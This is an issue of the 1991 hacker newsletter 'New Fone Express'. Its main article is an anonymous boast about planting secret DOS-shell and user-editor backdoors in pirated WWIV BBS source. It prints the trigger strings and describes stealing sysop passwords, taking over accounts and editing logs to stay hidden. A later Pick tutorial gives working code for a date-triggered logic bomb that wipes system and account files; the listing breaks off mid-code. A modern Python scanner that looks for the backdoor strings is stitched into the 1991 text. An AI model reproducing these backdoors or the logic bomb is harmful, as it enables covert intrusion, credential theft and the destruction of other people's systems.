=======================================
T H E   N E W   F O N E   E X P R E S S
=======================================
The newsletter of the Society for the Freedom of Information (SFI)
Electronic Edition
Central distribution site is Secret Society BBS
(314) 831-9039, WWIVNet 3460, 24hrs
------------------------------------------------------------------------------
The publisher, SFI, distribution site(s), and authors contributing to the NFX
are protected by the Bill of Rights in the U.S. Constitution, which
specifically protects freedom of speech and freedom of the press. The
information provided in this magazine is for informational purposes only, and
the publisher, SFI, distribution site(s) and authors are not responsible for
any problems resulting from the use of this information. Nor is SFI
responsible for consequences resulting from authors' actions. This
disclaimer is retroactive to all previous issues of the NFX.
We accept article submissions of nearly any sort, about
hack/phreak/anarchy/gov't/nets/etc. Send mail to the publisher (The
Cavalier) at any of these addresses:
WWIVnet [15@3460]
WWIVlink [442@13468]
VMB (301) 771-1151. hit #, then 140.
Ripco [send mail to Silicon Avalanche]
Daydream Nation [send mail to Silicon Avalanche]
Internet [[email protected] or [email protected]]
The printed edition of the newsletter is available for $14 (U.S.) per year on
paper or $2 (U.S.) for a single copy. Send mail to the New Fone Express,
Jackson House Rm 206, President's Park, 10309 Senatorial Lane, Fairfax, VA
22030. Don't forget your name and address.
To download the New Fone Express, call Secret Society at (314) 831-9039 and
log on as NFX, password NFX, phone# 0000, or see the distribution list
elsewhere in this magazine.
------------------------------------------------------------------------------
Highlights for Issue #6/November 1991
=====================================
* "Hacking WWIV v4.12" ... by (anonymous)
(see article #1)
* A Pick Tutorial Pt. 3 ... by Silicon Avalanche
(see article #2)
* Six Simple Things to Do.. ... by Polekat
(see article #3)
* Distribution Site List ... edited
(see article #4)
* Trendwatcher ... edited
(see article #5)
* Editorial ... by the Cavalier
(see article #6)
------------------------------------------------------------------------------
------------------------------------------------------------------------------
"Hacking WWIV v4.12"
The following is an account of a few special events that occurred in the
314 area code concerning the hacking of WWIV v4.12 bbs's. All of the events
described in this article happened between 12/03/90 and 10/04/91.
With the onset of a new version of WWIV coming out, my hunger for C
programming experience, and my amount of C programming language ever
expanding, I dreamed about what I might add to the new source code. Coming up
with some good ideas, (yes, actually useful WWIV mods) one very malicious
thought crossed my mind. Something a friend of mine had gotten me thinking
about earlier that day. Insert a back door into the WWIV source code, and
distribute the bogus source. Ahh yes! The ultimate power! Total control of
someone else's computer, that didn't know you in the slightest way! Earlier
that month, Wayne Bell had just made available, to all registered System
Operators of WWIV BBS software, the WWIV v4.12 source code. Since I was still
running v4.07 at the time, I decided this was a good time to upgrade. WWIV
v4.12, seemed to have a lot of great new features that would have required
massive modification to a v4.07 source code. Upon getting my paws on a copy
of the v4.12 source code, I sat down for about two and a half hours and modded
away. After I finished inserting a batch upload mod, 3 things forced me to
stop modding for the time being.
1) Fellow users would kill me if I called them at 2:30 AM to test a mod.
2) I wasn't sure if any of my users knew how to use Zmodem batch upload.
3) I was really hungry for about six White Castle hamburgers.
The part about the hamburgers, being the most dominant thought in my
mind, pushed me to jump in the car, head down to Dorsett Rd., and grab some
burgers.
While sitting in the car, eating my hamburgers, I deliberated over how I
might be able to use WWIV to gain control of other unsuspecting sysops'
computers. At that moment, there in the parking lot of White Castle, at
exactly 2:51 AM on 12/03/90, the ultimate hack plan hit me. I, like many other
unregistered WWIV sysops, had obtained the WWIV v4.12 source code, illegally.
Yes, a user had uploaded it to my computer. I had been considering
registration, since I wanted to get my BBS on WWIVnet, and this was a
requirement if your WWIV BBS was modded in the SLIGHTEST way. But I thought,
if it was so easy for me to get a copy of the source, just think of how many
other unregistered sysops are running pirate sources that they modded too!
The only thing that stood in my way of modifying and distributing a pirate
source code was PKZIP v1.10 authentic verification. When you unzip an
original unmodified v4.12 source, a -AV will appear next to every file, and
at the end, the message: 'Authenticity Verifies! Wayne Bell (UJK765).' Well,
if I modified any of the source files, and put them back in the zip, the
message would be more along the lines of: 'Authenticity Verification Failed!
Contact the author' or some BS like that. Deciding that I wouldn't worry
about this problem for now, I began to write my back door into the v4.12
source. Any dummy with an ounce of knowledge of C could have done it, I was
surprised that I hadn't ever heard of it being done before. Nonetheless, I
started out where all the //<COMMAND> sysop utility commands are written in
to the main source file.
The idea that hit me was to create a secret WWIV dos shell command that
didn't ask for a system pw. The command, like most 'special' commands in
WWIV would begin with a // preceding it, and would work when entered at
the main menu. It would have to be a code, that didn't even remotely look
like anything to a normal user. The code would need to look like an intricate
line of C programming. These two characteristics were required because,
first, and most important, I didn't want the code to be anything 'guessable.'
Secondly, it had to be 'hidden' from someone who might be paging through the
programming code. Strolling through the WWIV C code, I found a nice,
unguessable, line that would perfectly suit my needs. The line read as
follows:
//0_RDWR | 0_BINARY | 0_CREAT, S_IREAD
Upon deciding that this would be my secret shell to dos code, I scrolled
up to the //DOS function, to find out what made it work, and what asked for
the system password (SY:) before the shell occurred.
After block copying the programming code that came after //DOS, (the dos
shell activation programming code) and strategically placing it after my
//0_RDWR | 0_BINARY | 0_CREAT, S_IREAD code so it would be activated when
the // code was entered, I was ready to compile it and test it out on my own
system. After a few error corrections, time wasting errors like leaving off
a '{' or something stupid like that, I achieved a BBS.EXE that to everyone,
except myself would look perfectly ok to run a WWIV BBS on. I replaced my
normal BBS.EXE with this new one, and activated BBS.COM (to load everything
up). After using space+f to fast log on to my account, at the main prompt, I
entered the // code. I was immediately elated with happiness to see that I
had been abruptly thrown into a DOS shell. I didn't even get asked for a
system password. It was great! Since I was in such a good mood, I decided to
add one more // code into the BBS. This next code would activate the user
editor. Once I had begun using my back door, on other BBS's, I realized that
the User Editor back door wasn't worth crap, since you have to have a 255 SL
to be able to read passwords, and you can't give out anymore access than you
have. But, at the time that I programmed in the User Editor back door, I
wasn't thinking about this.
The next line details the code that activated the user editor. Again, it
was a far strung out code that no one would guess, looked like a line of C,
and was entered from the main menu prompt.
//SPRINTF(S1,%SUSER.IEND++261
Upon entry of this code, there is an instruction in the source to
activate a function called data(). Data() was a copy of void uedit() that I had
renamed, void data(), and stuck into the VOTEEDIT.C file. After entering this
code in, I was able to page through all of the user accounts, and see
whatever info I wanted to see, except passwords! I didn't realize the check for
a 255 SL upon password display until the source was distributed, so for the
most part, the user editor back door was useless.
Even if the uedit backdoor didn't do anything except display personal
info, I still had the most powerful weapon programmed into the code, the DOS
back door.
When I was finished with the bogus source, and felt that it was ready to
be distributed, I zipped it down, and placed it on my BBS for download. About
four months went by, and I forgot about the whole thing. As a sysop, I didn't
call out a whole lot, so I didn't know what BBS's might have the source,
furthermore, since I had forgotten about it, I didn't care. One day, my
friend who originally came up with the wonderful idea, called me with a
supreme amount of excitement in his voice. When I had programmed in the back
doors, I had given him a copy of the codes, and what they would do. At that
time, he seemed rather passive about it, and so was I. For some reason, both of
us didn't think anything would ever come of it. Anyway, he had called to tell
me that he had logged on to a modified, unregistered WWIV v4.12 BBS, and he had
typed in the back door code for the user editor, and much to his amazement,
it worked!
I'm sure many of you reading this, were familiar, or at least heard of
something called NGNet. It stands for Neat Guys Net (if that tells you
anything). Well, NGNet only expanded out to about six or seven BBS's, at the
height of its popularity, but one odd thing about all these BBS's, is that
they all looked EXACTLY alike, and I mean EXACTLY. All of them had the SAME
modified pirated WWIV v4.12 source code. It was a hacker's dream come true.
To have total control of a whole slew of BBS's, on their own network. It
turns out, that the originator of NGNet, whose name I do not know, somehow got
a copy of the source code that I had modified. He then, not knowing that there
was a back door in the source, modified it to his liking. After this, he gave
a copy of the modified BBS.EXE to the other BBS's that were in NGNet. Almost
all of the BBS's in NGNet, being run by bullshit sysops that didn't know crap
about source modification, immediately switched to this new BBS.EXE with the
mods that the originator of NGNet had installed, and which back door mod was
in too.
The first BBS that I used the DOS door on, was The Mysterious Land of
A&F. It worked flawlessly, and with my extra knowledge of WWIV password
storage, I knew right where all the info I needed was. Since I was in DOS, I
made my way to the \WWIV directory. By typing the CONFIG.DAT file, I was
granted, along with a lot of garbage characters, the system password. After
activating my printscreen key to send that password to the printer, I wasted no
time in making my way into the \WWIV\DATA directory. Here I typed the USER.LST
file. Among all the garbage that filled my screen, a few key numbers and one
word caught my attention. The numbers were the last four digits of the sysop's
phone number, and the key word was the sysop's password! Now, armed with the
system password, the sysop's personal password, and the last four digits of
the sysop's phone number, nothing could stop me from taking complete control
of the BBS! After issuing exit, and a carriage return, I was soon back in
WWIV. I quickly logged off, and began to dial that very very Mysterious Land
of A&F again. This time, instead of logging on as a normal account, I put in
all the sysop's info, and soon I was on the BBS via the sysop's account. I
was curious as to what Mysterious secrets the Land of A&F held, so I began to
look around. A quick trip into the transfer area revealed some shocking news
about the sysop, and the type of BBS he ran. Dropping back to the main menu,
I requested a list of the message bases via the '*' command. The first message
base that caught my eye, and for the moment, piqued my interest, was the
NGNet Sysops' Discussion Net. Scanning through the messages, I noticed, what I
had assumed about the NGNet BBS's. Most of the sysops were, or acted like they
were no older than 15 years old. So many of the messages on this sub were so
worthless, things like "Hey guys....how do you like my new macro" and "Do any
of you other NGN bbs's out there have any new porno GIFS you could upload to
my board?" This kind of crap is the pointless childish bullshit that I try to
avoid when I call out, let alone when I go seriously hacking. Anyway, after
reading these discouraging messages, I became extremely uninterested in the
message bases. I then, shelled down to dos, this time using the legit //DOS
command, and the system password. After looking around for a while, and
finding some more incriminating evidence about the sysop, I got kind of
bored.
Since I felt that it would be nice to keep this BBS under my thumb, I needed
to edit the daily sysop log files, so the sysop wouldn't realize someone had
been there, under his account. After some copying, downloading, uploading,
and overwriting of files, the edited sysop log files were in place, and I
felt at ease about the whole thing. My terminal program displayed that I had
been on the BBS for 38 minutes. I was tiring fast, as in order for the sysop
not to see me, I had to do this at 3:15 AM, so I logged off and went to bed.
As time went on, my friend and I noticed, and hacked into all the BBS's that
were on the NGNet. We even did a few that weren't on the net, and had just
picked up a copy of the bogus source floating around. All in all, it was an
incredible feat to be accomplished, but, with the help of some extremely
stupid sysops who failed to look for Authentic Verification when they
unzipped their pirate source codes, it was very possible. I suppose there is
some kind of moral to this story, that being that you should probably register
WWIV if you want to mod the source, but I won't go too far into that.
A Few Side Notes
Of all the time I spent hacking at the NGNet bbs's, I think I spent the
most time on Land of A&F. That bbs, and Quality Connection, interested me
most. Of course, with all this hacking, it had to happen. I screwed up a few
times. Never did I mess up so bad, that the sysop totally found out about
what was going on, but I did make a few mistakes. One time, when I was on
Land of A&F, I forgot to edit the sysop's name (I had logged on under his
account) out of the 'last few callers' file. Amazingly, Awesome A, the sysop
of A&F, didn't catch it. Another time, I had copied all of Mr. Quality's
(sysop of Quality Connection) bbs passwords off his hdd via the back door in
Quality Connection. Mr. Quality had sysop access at Land of A&F, so of course,
I had to check things out from his account, even though I knew it all would be
the same. I was getting kind of lazy, and one time I didn't really feel like
doing all of the log file editing, so I just logged off. A few days later, I
intercepted a message on the NGNet Sysop Discussion Sub (while on under the
sysop's account) that Awesome A had posted. It alerted all the NGN bbs's of
a hacker that logged on to Land of A&F under Mr. Quality's account. Of course,
none of those dumbshit NGNet sysops even thought there might be something
wrong with their source code, or EXE file. With Mr. Quality's other
passwords, I gained total control over a few bbs's that didn't even have the
back door in them, but where Mr. Quality had sysop access on. I did this with
Awesome A's passwords too, and at one time had total control of Too $hort's
bbs, the Ghetto. Too $hort wasn't running the pirate source code, but for
some reason he had given Awesome A sysop access. From here, I copied out all of
Too $hort's passwords, and used his accounts around town. It was nice to have
full run over so many bbs's. Too $hort had pretty good access (90 SL) at
Master Control Program, which allowed me to batch d/l from there quite often,
but I never was able to get an account, on MCP, that had anything better than
a 90. I never did really get to know Too $hort beyond a dialout to his bbs,
but I'll tell you one thing, I really hate the way he signs his name, Too
$hort, the dollarsign, in my opinion, is really squidly. Another good bbs,
that I called quite a bit, usually under false accounts, was Secret Society.
Grim stocks an excellent selection of informational text files, but he needs
to upgrade to at least 2400 sometime in the near future, if he expects to
keep that excellent group of users calling.
I know that many of you who read this will doubt any of what I have said
ever happened, and you'd be an idiot not to unless some evidence was
presented. Yes, that's correct, the evidence IS out there. I can guarantee
anyone that the modified WWIV v4.12 source is out there, somewhere still on-
line ready to be downloaded off of some weak, non current pirate bbs. If you
happen to see a copy of the WWIV v4.12 source, on a bbs, do an archive
listing, and, if possible, an integrity check. If it doesn't have any pkzip
verification on it, then extract out the BBS.C and VOTEEDIT.C files and
download them. Load BBS.C into an editor, and do a 'string search.' Search
for either one of the above // codes. Both, the dos door, and the uedit door
should be in there. Also, in VOTEEDIT.C, as I mentioned before, there is a
function in there called data(). In it is the exact same thing that was in
the function uedit(). Also, another way of proof, is that you could possibly
find and call an unregistered, modified WWIV v4.12 bbs and attempt to use
those codes. But since v4.20 is out, I doubt many of the idiotic squid sysops
that grasped on to the unverified v4.12 source will still be with v4.12, they
will probably have upgraded to v4.20 now, being that their bbs's are so damn
unstable.
I never did register my copy of WWIV, as my bbs went down a short time
ago, and I never was able to get on WWIVnet. It was on-line for over four
years, very private, but lately, I've realized the lousy condition of the
hack/phreak/anarchy community, and I've just kind of lost interest in
bbs'ing.
I'm writing this, partly, to try and 'do my part' for the hack/phreak/anarchy
community, and show the others out there that yes, there are still a few
conniving, ingenious, ruthless hackers out there. I'd like to see the other
true hackers out there get off their asses and do something! If you're not
going to hack anymore, at least write an article about your experiences, and
send it to the editor of Phrack, NFX, Digital Underground (If DU is still in
publication) or any electronic publication. Don't go around destroying
systems (rm *), just hack them, and brag about it, just like the old days.
Note that I never once deleted a file on any of the computers that I hacked,
that I wasn't absolutely sure I would replace.
-Disclaimer of Who I Am-
I don't really bbs too much any more, as I haven't been interested in it
for quite some time now. Still, just to avoid any accusations, phone
harassment, or any bullshit from those NGNet sysops, whom I'm sure will be
extremely pissed once they hear of this, I'll be placing strict anonymity
on this article. Don't come after the editor of New Fone Express, as even he
won't know who I am. I'm not even sure that he'll put this in his
publication.
And above all, please don't be an ass and throw accusations around at other
bbs'ers. I'm only slightly active on one bbs now, and if I don't call there
within four days from now, I'll be deleted due to inactivity. As I mentioned
before, I don't have an account on MCP any more, again, due to inactivity. I
had a stable account on Secret Society, but for quite some time, I've been
deleted, yes again, due to inactivity. I tried to keep a stable account on
Angel Station, but it seemed that bbs was always crashing, and everyone
would have to logon as new users. I'm pretty sure I've been deleted on
Blitzkrieg, but I have to say that that was one of the best, most stable
bbs's I was ever on. So, if you are ready to go on some hellish trek to even
attempt to find me, give up now! Don't waste your time, as I'm sure your
attempt(s) will be in vain. ><
[TC: The best chance you have of reaching the author is to send mail to me,
and I will forward it to the false account that has been set up. Also, the
author included around 30k of screen capture files from the hack itself,
which I have omitted in the interests of space.]
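The source audit the article describes (a string search of BBS.C for the two // codes, and a data() in VOTEEDIT.C that duplicates uedit()) can be scripted. This is an added example, not part of the original article or of WWIV: the C fragments are constructed, and it assumes the codes are compared as string literals and that the printed 0_RDWR may be spelled O_RDWR in a real tree.

```python
import re

# Command strings quoted in the article, without the leading "//".
MARKERS = [
    "0_RDWR | 0_BINARY | 0_CREAT, S_IREAD",
    "SPRINTF(S1,%SUSER.IEND++261",
]
STRING_LITERAL = re.compile(r'"((?:[^"\\\n]|\\.)*)"')


def _norm(text):
    """Uppercase, strip whitespace, fold letter O to digit 0.

    Assumption: the article prints 0_RDWR; real C headers spell it O_RDWR.
    """
    return re.sub(r"\s+", "", text).upper().replace("O", "0")


def find_marker_literals(source):
    """Return [(line_no, literal)] for string literals containing a marker.

    Only literals are checked (assumption: the command is compared as a
    string). The first marker was lifted from ordinary code, so a plain
    text search also hits legitimate open() calls in a clean tree.
    """
    wanted = [_norm(m) for m in MARKERS]
    hits = []
    for line_no, line in enumerate(source.splitlines(), 1):
        for match in STRING_LITERAL.finditer(line):
            if any(w in _norm(match.group(1)) for w in wanted):
                hits.append((line_no, match.group(1)))
    return hits


def function_body(source, name):
    """Whitespace-stripped body of `void name(...)`, or None if absent.

    Simple brace matching; braces inside strings or comments are not handled.
    """
    head = re.search(r"\bvoid\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", source)
    if not head:
        return None
    depth, i = 1, head.end()
    while i < len(source) and depth:
        depth += {"{": 1, "}": -1}.get(source[i], 0)
        i += 1
    if depth:
        return None
    return re.sub(r"\s+", "", source[head.end():i - 1])


def is_renamed_copy(src_a, name_a, src_b, name_b):
    """True when both functions exist and their bodies are identical."""
    body_a = function_body(src_a, name_a)
    return body_a is not None and body_a == function_body(src_b, name_b)


# Constructed fragments for illustration; not actual WWIV source.
CLEAN_BBS_C = '''
f = open(s, O_RDWR | O_BINARY | O_CREAT, S_IREAD | S_IWRITE);
if (strcmp(s, "DOS") == 0) ask_system_password();
'''
TAMPERED_BBS_C = CLEAN_BBS_C + '''
if (strcmp(s, "0_RDWR | 0_BINARY | 0_CREAT, S_IREAD") == 0) placeholder();
'''
UEDIT_SRC = "void uedit()\n{\n  show_user(1);\n  if (sl == 255) { show_pw(); }\n}\n"
VOTEEDIT_C = ("void voteedit() { edit(); }\n"
              "void data() {\n  show_user(1);\n  if (sl == 255) { show_pw(); }\n}\n")

if __name__ == "__main__":
    print(find_marker_literals(CLEAN_BBS_C))
    print(find_marker_literals(TAMPERED_BBS_C))
    print(is_renamed_copy(UEDIT_SRC, "uedit", VOTEEDIT_C, "data"))
```

The clean fragment yields no hits even though it contains the same text as code, which is why the scan looks only inside string literals.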
------------------------------------------------------------------------------
------------------------------------------------------------------------------
Pick Tutorial
A Pick Tutorial - Courtesy of Silicon Avalanche of SFI
Installment #3
COUGH.. HACK... WHEEZE...
Hello everybody, and welcome to the latest edition of the Pick
Tutorial. This volume is a quickie (because I'm about a week past the
submission deadline, and the publisher is starting to hound me), about a
simple, generic Pick virus. Let's get started, 'eh?
>ED SYSPROG-PL USER-COLDSTART
TOP
.
001 PQ
. I
001+HVIR
001+P
001+
. FI
>ED BP VIR
NEW ITEM
TOP
. I
001+*
002+*
003+*
004+*
005+*
006+BREAK OFF
007+WAKEUPDATE="MM/DD/YY"
008+* In the above, replace the MM/DD/YY with a month, day and year.
009+WAKEDATEIC=ICONV(WAKEUPDATE,"DI")
010+*
011+IF DATE()#WAKEDATEIC THEN STOP
012+* Tell everybody we're here...
013+EXECUTE "BLOCK-PRINT TIME'S UP!!!! HEH HEH HEH HEH HEH HEH HEH HEH
HEH..."
014+* Wipe out the SYSTEM file - lose all the accounts...
015+EXECUTE "CLEAR-FILE DICT SYSTEM" CAPTURING JUNK RETURNING MOREJUNK
016+EXECUTE "CLEAR-FILE DATA SYSTEM" CAPTURING JUNK RETURNING MOREJUNK
017+* Wipe out the MASTER DICTIONARY (MD)
018+EXECUTE "CLEAR-FILE DICT MD" CAPTURING JUNK RETURNING MOREJUNK
019+EXECUTE "CLEAR-FILE DATA MD" CAPTURING JUNK RETURNING MOREJUNK
020+* Wipe out the ERRMSG file
021+EXECUTE "CLEAR-FILE DICT ERRMSG" CAPTURING JUNK RETURNING MOREJUNK
022+EXECUTE "CLEAR-FILE DATA ERRMSG" CAPTURING JUNK RETURNING MOREJUNK
023+* Create a new LOGON banner to tell everyone hello...
024+REC=''
025+REC<1>="L(12)"
026+REC<2>="S(25)"
027+REC<3>="HYour System's been SHUT DOWN!!"
028+* Add as many lines saying whatever you want, but the last line MUST be:
029+REC<4>=+
030+* in this case, 4 is the last line, this would be a 50 if REC<1> through
031+* REC<49> were defin